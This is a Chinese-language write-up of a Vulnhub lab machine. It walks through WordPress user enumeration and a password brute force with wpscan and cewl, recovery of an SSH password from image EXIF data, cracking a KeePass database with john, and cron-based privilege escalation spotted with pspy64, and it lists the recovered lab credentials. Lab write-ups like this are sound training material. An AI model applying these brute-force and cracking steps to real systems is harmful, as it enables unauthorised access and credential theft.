开始先扫一下c段发现靶机

image-20230430155615236

然后开始扫一下端口

image-20230430155709668

还是标配两个端口

进行80端口的访问

image-20230430155746105

是一个wordpress cms框架的网页 这里也给了版本

可以先用wpscan工具去进行扫描

这里先去找一下后台,用dirb先扫一下这个网址

image-20230430160144662

image-20230430160134822

扫到了后台,那么我们就去用wpcan工具去扫一下网站的用户名

1
wpscan --url http://192.168.205.142 -e u 

image-20230430160547357

然后使用cewl生成密码字典配合wpscan进行爆破

1
cewl -m 3 -w passwd.txt http://192.168.205.142 

image-20230430160711724

-m 是指的密码的最短长度

然后使用wpcan进行爆破

1
wpscan --url http://192.168.205.142/ -e u --passwords passwd.txt

image-20230430161014964

报出用户名和密码了,接下来进行登录

1
Username: gill, Password: interchangeable

image-20230430161140468

成功进行登录

于是就开始尝试找漏洞了

image-20230430161251659

发现一张网站页面没有的图片,于是尝试把他下载下来进行查看

image-20230430161407371

成功下载下来

这里查看图片得使用这个工具

exiftool

image-20230430161620834

1
2
apt-get Install exiftool
使用该命令进行安装

image-20230430162208301

image-20230430162232774

发现了ssh的登录密码,于是尝试去进行登录

image-20230430162333707

成功进行登录

image-20230430162354156

拿到第一个flag,这里有第二个文件,不知道是啥

直接读的话是乱码

上网搜索后发现

image-20230430162524584

image-20230430163023836

这里的话是使用scp命令将文件复制到本地进行查看

1
scp gill@192.168.142.149:/home/gill/key* /root

image-20230430163242074

成功传输下来

keyfile.kdbx 内容转为 john 支持的格式:keepass2john keyfile.kdbx > Keepasshash.txt

image-20230430163335747

然后使用john进行密码的爆破

image-20230430163622503

爆破出来那个加密文件里的内容了

将刚才的keyfile.kdbx文件上传到keeWeb, 输入破解出的密码即可打开,得到六个类似密码的字符串

1
链接:https://app.keeweb.info/

获得了6个密码

1
2
3
4
5
6
2real4surreal 
buddyretard
closet313
exalted
fracturedocean
zakkwylde

然后尝试使用这些密码进行root用户的登录全都失败了

image-20230430170151033

这里的话可以利用这个工具来进行使,看一下进程有没有定时执行的任务

1
2
3
4
kali起个临时服务
靶机下载pspy64: wget http://192.168.111.7/pspy64
给予权限:chmod +x pspy64
执行:./pspy64

image-20230430170732813

成功下载下载到靶机上

image-20230430171115969

这个任务每隔一分钟就自动执行一次,于是就猜测是会定时执行任务,那么我们就考虑使用他来进行提权了

image-20230430171233766

在根目录下发现一个诡异的目录,于是进行查看

那么猜测是使用他进行提权,这里久刚好用到之前爆破出来的密码了,在查看别人的wp,发现key.sh源码的意思是,如果这个文件下有fracturedocean这个文件的话,就会执行下面的代码,就会把装有root,密码的文件下载下来

image-20230430171856129

拿到密码

image-20230430171951855

这就是key.sh的文件内容了

Vulnhub靶机渗透总结:
1.cewl 生成字典和wpscan 工具暴力破解的使用
2.Exiftool 这个工具用来对EXIF信息解析(第一次了解这个工具的使用和作用)
3..kdbx文件密码破解(新知识点,第一次做花的时间比较多)
4.如果临时开启不了web服务 可以使用scp 这个命令(非常好用!!)
5.解密 keepass 数据库获取密码(虽然没啥用 但是也是第一次了解 新知识点)
6.定时提权 下载脚本pspy64 查看 创建key 文件提权

这里的pspy64可以进行进程的查看(不用root权限),刚好可以进行判断是否存在定时提权